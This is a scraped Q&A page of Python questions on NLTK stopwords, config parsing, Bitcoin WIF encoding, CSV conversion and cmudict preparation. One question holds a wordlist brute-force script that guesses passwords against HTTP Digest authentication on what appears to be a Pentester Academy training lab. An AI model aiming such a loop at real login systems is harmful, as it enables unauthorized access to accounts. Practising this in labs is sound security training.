Can't avoid stop words in tokens list

Can't avoid stop words in tokens list - python-3.x

I'm normalizing text from wiki and one if the task is to delete stopwords(item) from text tokens. But I can't do it, to be more exact, I can't avoid some of the items.
Code:
# coding: utf8
import os
from nltk import corpus, word_tokenize, FreqDist, ConditionalFreqDist
import win_unicode_console
win_unicode_console.enable()
stop_words_plus = ['il', 'la']
text_tags = ['doc', 'https', 'br', 'clear', 'all']
it_sw = corpus.stopwords.words('italian') + text_tags + stop_words_plus
it_path = os.listdir('C:\\Users\\1\\projects\\i')
lom_path = 'C:\\Users\\1\\projects\\l'
it_corpora = []
lom_corpora = []
def normalize(raw_text):
tokens = word_tokenize(raw_text)
norm_tokens = []
for token in tokens:
if token not in it_sw and token.isalpha() and len(token) > 1:
token = token.lower()
norm_tokens.append(token)
return norm_tokens
for folder_name in it_path:
path_to_files = 'C:\\Users\\1\\projects\\i\\%s' % (folder_name)
files_list = os.listdir(path_to_files)
for file_name in files_list:
file_path = path_to_files + '\\' + file_name
text_file = open(file_path, encoding='utf8')
raw_text = text_file.read()
norm_tokens = normalize(raw_text)
it_corpora += norm_tokens
print(FreqDist(it_corpora).most_common(10))
Output:
[('anni', 1140), ('il', 657), ('la', 523), ('gli', 287), ('parte', 276), ('stato', 276), ('due', 269), ('citta', 254), (
'nel', 248), ('decennio', 242)]
As you can see, I need to avoid words 'il' and 'la', I add them to list(it_sw) and there they are(I've checked). Then I in the func normalize I try to avoid them by `if token not in it_sw, but it doesn't work and I have no idea what's wrong.

You convert your token to lower case after finding that it is not in it_sw. Is it possible that some of your tokens have upper case characters? In this case you could adjust your for loop slightly:
for token in tokens:
token = token.lower()
if token not in it_sw and token.isalpha() and len(token) > 1:
norm_tokens.append(token)
By the way, I'm not sure if the performance of your code is important, but if it is you might get much better performance by checking for the presence of the tokens in a set instead of a list, just change your definition of it_sw to:
it_sw = set(corpus.stopwords.words('italian') + text_tags + stop_words_plus)
You could also change it_corpora into a set, but that would require a few more small changes.

Related

Creating nested dictionary from text file in python3

I have a text file of thousands of blocks like this. For processing I needed to convert it into dictionary.
Text file Pattern
[conn.abc]
domain = abc.com
id = Mike
token = jkjkhjksdhfkjshdfhsd
[conn.def]
domain = efg.com
id = Tom
token = hkjhjksdhfks
[conn.ghe]
domain = ghe.com
id = Jef
token = hkjhadkjhskhfskdj7979
Another sample data
New York
domain = Basiclink.com
token = eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyIsImtpZCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyJ9.eyJhdWQiOiJodHRwczovL21zLmNvbS9zbm93
method = http
username = abc#comp.com
Toronto
domain = hollywoodlink.com
token = eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyIsImtpZCI6Im5PbzNaRHJPRFhFSzFqS1doWHNsSFJfS1hFZyJ9.eyJhdWQiOiJodHRwczovL21zLmNvbS9zbm93Zmxha2UvsfdsdcHJvZGJjcy1lYXN0LXVzLTIiLCJpc3MiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC9lMjliODE
method = http
username = abc#comp.com
Would like to convert it into following.
d1={conn.abc:{'domain':'abc.com','id': 'Mike',token:'jkjkhjksdhfkjshdfhsd'}
conn.def:{'domain':'efg.com', 'id': 'Tom',token:'hkjhjksdhfks'}
conn.ghe:{'domain':'ghe.com', 'id': 'Jef',token:'hkjhadkjhskhfskdj7979'}}
Thanks

Since the input file can have varying # of lines with data, this code should work.
Assumptions:
Each key (eg: conn.abc) will start with open square bracket and end with open square bracket. example [conn.abc]
Each inner dictionary key value will be separated by =
If the key value can either be [key] or key, then use the below line of code instead of the commented line of code.
elif '=' not in line:
#elif line[0] == '[' and line[-1] == ']':
Code for this is:
with open('abc.txt', 'r') as f:
d1 = {}
for i, line in enumerate(f):
line = line.strip()
if line == '': continue
elif line[0] == '[' and line[-1] == ']':
if i !=0: d1[dkey]= dtemp
dkey = line[1:-1]
dtemp = {}
else:
line_key,line_value = line.split('=')
dtemp[line_key.strip()] = line_value.strip()
d1[dkey]=dtemp
print (d1)
If the input file is:
[conn.abc]
domain = abc.com
id = Mike
token = jkjkhjksdhfkjshdfhsd
[conn.def]
domain = efg.com
id = Tom
dummy = Test
token = hkjhjksdhfks
[conn.ghe]
domain = ghe.com
id = Jef
token = hkjhadkjhskhfskdj7979
The output will be as follows:
{'conn.abc': {'domain': 'abc.com', 'id': 'Mike', 'token': 'jkjkhjksdhfkjshdfhsd'},
'conn.def': {'domain': 'efg.com', 'id': 'Tom', 'dummy': 'Test', 'token': 'hkjhjksdhfks'},
'conn.ghe': {'domain': 'ghe.com', 'id': 'Jef', 'token': 'hkjhadkjhskhfskdj7979'}}
Note here that I added dummy = Test as a key value for conn.def. So your output will have that additional key:value in the output.

You can use standard configparser module:
import configparser
config = configparser.ConfigParser()
config.read("name_of_your_file.txt")
Then you can work with config as standard dictionary:
for name_of_section, section in config.items():
for name_of_value, val in section.items():
print(name_of_section, name_of_value, val)
Prints:
conn.abc domain abc.com
conn.abc id Mike
conn.abc token jkjkhjksdhfkjshdfhsd
conn.def domain efg.com
conn.def id Tom
conn.def token hkjhjksdhfks
conn.ghe domain ghe.com
conn.ghe id Jef
conn.ghe token hkjhadkjhskhfskdj7979
Or:
print(config["conn.abc"]["domain"])
Prints:
abc.com

Issue producing a valid WIF key with Python 3.6 (Pythonista - iPadOS)

I am having some issues with some code. I have set about a project for creating Bitcoin wallets in an attempt to turn a hobby into a learning experience, whereby I can understand both Python and the Bitcoin protocol in more detail. I have posted here rather than in the Bitcoin site as the question is related to Python programming.
Below I have some code which I have created to turn a private key into a WIF key. I have written this out for clarity rather than the most optimal method of coding, so that I can see all the steps clearly and work on issues. This code was previously a series lines which I have now progressed into a class with functions.
I am following the example from this page: https://en.bitcoin.it/wiki/Wallet_import_format
Here is my current code:
import hashlib
import codecs
class wif():
def private_to_wif(private_key):
extended_key = wif.create_extended(private_key)
address = wif.create_wif_address(extended_key)
return address
def create_extended(private_key):
private_key1 = bytes.fromhex(private_key)
private_key2 = codecs.encode(private_key1, 'hex')
mainnet = b'80'
#testnet = b'ef'
#compressed = b'01'
extended_key = mainnet + private_key2
return extended_key
def create_wif_address(extended_key):
first_hash = hashlib.sha256(extended_key)
first_digest = first_hash.digest()
second_hash = hashlib.sha256(first_digest)
second_digest = second_hash.digest()
second_digest_hex = codecs.encode(second_digest, 'hex')
checksum = second_digest_hex[:8]
extended_key_chksm = (extended_key + checksum).decode('utf-8')
wif_address = base58(extended_key_chksm)
return wif_address
def base58(extended_key_chksm):
alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
b58_string = ''
leading_zeros = len(extended_key_chksm) - len(extended_key_chksm.lstrip('0'))
address_int = int(extended_key_chksm, 16)
while address_int > 0:
digit = address_int % 58
digit_char = alphabet[digit]
b58_string = digit_char + b58_string
address_int //= 58
ones = leading_zeros // 2
for one in range(ones):
b58_string = '1' + b58_string
return b58_string
I then use a few lines of code to get this working, using the example private key from the above guide, as follows:
key = ‘0C28FCA386C7A227600B2FE50B7CAE11EC86D3BF1FBE471BE89827E19D72AA1D‘
address = wif.private_to_wif(key)
Print(address)
I should be getting the output: 5HueCGU8rMjxEXxiPuD5BDku4MkFqeZyd4dZ1jvhTVqvbTLvyTJ
Instead I’m getting:
5HueCGU8rMjxEXxiPuD5BDku4MkFqeZyd4dZ1jvhTVqvbWs6eYX
It’s only the last 6 characters that differ!
Any suggestions and help would be greatly appreciated.
Thank you in advance.
Connor

I have managed to find the solution by adding a missing encoding step.
I am posting for all those who run into a similar issue and can see the steps that brought resolution.
def create_wif_address(extended_key):
extended_key_dec = codecs.decode(extended_key, 'hex')
first_hash = hashlib.sha256(extended_key_dec)
first_digest = first_hash.digest()
second_hash = hashlib.sha256(first_digest)
second_digest = second_hash.digest()
second_digest_hex = codecs.encode(second_digest, 'hex')
checksum = second_digest_hex[:8]
extended_key_chksm = (extended_key + checksum).decode('utf-8')
wif_address = base58(extended_key_chksm)
return wif_address
So above I added in a step to the function, at the beginning, to decode the passed in variable from a hexadecimal byte string to raw bytes, which is what the hashing algorithms require it seems, and this produced the result I was hoping to achieve.
Connor

How to handle blank line,junk line and \n while converting an input file to csv file

Below is the sample data in input file. I need to process this file and turn it into a csv file. With some help, I was able to convert it to csv file. However not fully converted to csv since I am not able to handle \n, junk line(2nd line) and blank line(4th line). Also, i need help to filter transaction_type i.e., avoid "rewrite" transaction_type
{"transaction_type": "new", "policynum": 4994949}
44uu094u4
{"transaction_type": "renewal", "policynum": 3848848,"reason": "Impressed with \n the Service"}
{"transaction_type": "cancel", "policynum": 49494949, "cancel_table":[{"cancel_cd": "AU"}, {"cancel_cd": "AA"}]}
{"transaction_type": "rewrite", "policynum": 5634549}
Below is the code
import ast
import csv
with open('test_policy', 'r') as in_f, open('test_policy.csv', 'w') as out_f:
data = in_f.readlines()
writer = csv.DictWriter(
out_f,
fieldnames=[
'transaction_type', 'policynum', 'cancel_cd','reason'],lineterminator='\n',
extrasaction='ignore')
writer.writeheader()
for row in data:
dict_row = ast.literal_eval(row)
if 'cancel_table' in dict_row:
cancel_table = dict_row['cancel_table']
cancel_cd= []
for cancel_row in cancel_table:
cancel_cd.append(cancel_row['cancel_cd'])
dict_row['cancel_cd'] = ','.join(cancel_cd)
writer.writerow(dict_row)
Below is my output not considering the junk line,blank line and transaction type "rewrite".
transaction_type,policynum,cancel_cd,reason
new,4994949,,
renewal,3848848,,"Impressed with
the Service"
cancel,49494949,"AU,AA",
Expected output
transaction_type,policynum,cancel_cd,reason
new,4994949,,
renewal,3848848,,"Impressed with the Service"
cancel,49494949,"AU,AA",

Hmm I try to fix them but I do not know how CSV file work, but my small knoll age will suggest you to run this code before to convert the file.
txt = {"transaction_type": "renewal",
"policynum": 3848848,
"reason": "Impressed with \n the Service"}
newTxt = {}
for i,j in txt.items():
# local var (temporar)
lastX = ""
correctJ = ""
# check if in J is ascii white space "\n" and get it out
if "\n" in f"b'{j}'":
j = j.replace("\n", "")
# for grammar purpose check if
# J have at least one space
if " " in str(j):
# if yes check it closer (one by one)
for x in ([j[y:y+1] for y in range(0, len(j), 1)]):
# if 2 spaces are consecutive pass the last one
if x == " " and lastX == " ":
pass
# if not update correctJ with new values
else:
correctJ += x
# remember what was the last value checked
lastX = x
# at the end make J to be the correctJ (just in case J has not grammar errors)
j = correctJ
# add the corrections to a new dictionary
newTxt[i]=j
# show the resoult
print(f"txt = {txt}\nnewTxt = {newTxt}")
Termina:
txt = {'transaction_type': 'renewal', 'policynum': 3848848, 'reason': 'Impressed with \n the Service'}
newTxt = {'transaction_type': 'renewal', 'policynum': 3848848, 'reason': 'Impressed with the Service'}
Process finished with exit code 0

cant get encoding to work in python 3

I have created a program and from what I understand from the error shown below and from other posts on Stack, I need to encode the object before it can be hashed.
I have tried several ways to do this but still keep getting the same error message. provided below is my code and also a list of changes I have tried.
I understand what needs to be done but I guess I'm putting the code in the wrong place or the syntax is wrong as what I am trying isn't working.
any help is much appreciated.
Error Message
ha1 = hashlib.md5(user + ':' + realm + ':' + password.strip()).hexdigest()
TypeError: Unicode-objects must be encoded before hashing
Code
import sys
import requests
import hashlib
realm = "Pentester Academy"
lines = [line.rstrip('\n') for line in open('wordl2.txt')]
print (lines)
for user in ['nick', 'admin']:
get_response = requests.get("http://pentesteracademylab.appspot.com/lab/webapp/digest2/1")
test_creds = get_response
print (test_creds)
for password in lines:
# not the correct way but works for this challenge
snounce = test_creds.headers.get('www-authenticate').split('"')
uri = "/lab/webapp/digest2/1"
# create the HTTP Digest
ha1 = hashlib.md5(user + ':' + realm + ':' + password.strip()).hexdigest()
ha2 = hashlib.md5("GET:" + uri).hexdigest()
response = hashlib.md5(ha1 + ':' + snounce + ':' + ha2).hexdigest()
header_string = 'Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"' % (user, realm, snounce, uri, response)
headers = { 'Authorization' : header_string }
test_creds = requests.get("http://pentesteracademylab.appspot.com/lab/webapp/digest2/1", headers = headers)
if test_creds.status_code == 200:
print ("CRACKED: %s:%s" % (user,password))
break
elif test_creds.status_code == 401:
print ("FAILED: %s:%s" % (user,password))
else:
print ("unexpected Status code: %d " % test_creds.status_code)
Attempted Changes
password.encode(utf-8)
----------------------
hashlib.md5().update(password.encode(lines.encoding))
---------------
lines = [line.rstrip('\n') for line in open('wordl2.txt', "rb")]

I have managed to solve my own problem using the line
pass2 = str.encode(password)
just inside the password for loop

How to convert cmudict-0.7b or cmudict-0.7b.dict in to FST format to use it with phonetisaurus?

I am looking for a simple procedure to generate FST (finite state transducer) from cmudict-0.7b or cmudict-0.7b.dict, which will be used with phonetisaurus.
I tried following set of commands (phonetisaurus Aligner, Google NGramLibrary and phonetisaurus arpa2wfst) and able to generate FST but it didn't work. I am not sure where I did a mistake or miss any step. I guess very first command ie phonetisaurus-align, is not correct.
phonetisaurus-align --input=cmudict.dict --ofile=cmudict/cmudict.corpus --seq1_del=false
ngramsymbols < cmudict/cmudict.corpus > cmudict/cmudict.syms
/usr/local/bin/farcompilestrings --symbols=cmudict/cmudict.syms --keep_symbols=1 cmudict/cmudict.corpus > cmudict/cmudict.far
ngramcount --order=8 cmudict/cmudict.far > cmudict/cmudict.cnts
ngrammake --v=2 --bins=3 --method=kneser_ney cmudict/cmudict.cnts > cmudict/cmudict.mod
ngramprint --ARPA cmudict/cmudict.mod > cmudict/cmudict.arpa
phonetisaurus-arpa2wfst-omega --lm=cmudict/cmudict.arpa > cmudict/cmudict.fst
I tried fst with phonetisaurus-g2p as follows:
phonetisaurus-g2p --model=cmudict/cmudict.fst --nbest=3 --input=HELLO --words
But it didn't return anything....
Appreciate any help on this matter.

It is very important to keep dictionary in the right format. Phonetisaurus is very sensitive about that, it requires word and phonemes to be tab separated, spaces would not work then. It also does not allow pronunciation variant numbers CMUSphinx uses like (2) or (3). You need to cleanup dictionary with simple python script for example before feeding it into phonetisaurus. Here is the one I use:
#!/usr/bin/python
import sys
if len(sys.argv) != 3:
print "Split the list on train and test sets"
print
print "Usage: traintest.py file split_count"
exit()
infile = open(sys.argv[1], "r")
outtrain = open(sys.argv[1] + ".train", "w")
outtest = open(sys.argv[1] + ".test", "w")
cnt = 0
split_count = int(sys.argv[2])
for line in infile:
items = line.split()
if items[0][-1] == ')':
items[0] = items[0][:-3]
if items[0].find("_") > 0:
continue
line = items[0] + '\t' + " ".join(items[1:]) + '\n'
if cnt % split_count == 3:
outtest.write(line)
else:
outtrain.write(line)
cnt = cnt + 1

Develop Reference

node.js excel linux python-3.x azure haskell apache-spark rust .htaccess string

Can't avoid stop words in tokens list - python-3.x

Related

Creating nested dictionary from text file in python3

Issue producing a valid WIF key with Python 3.6 (Pythonista - iPadOS)

How to handle blank line,junk line and \n while converting an input file to csv file

cant get encoding to work in python 3

How to convert cmudict-0.7b or cmudict-0.7b.dict in to FST format to use it with phonetisaurus?

Categories

Resources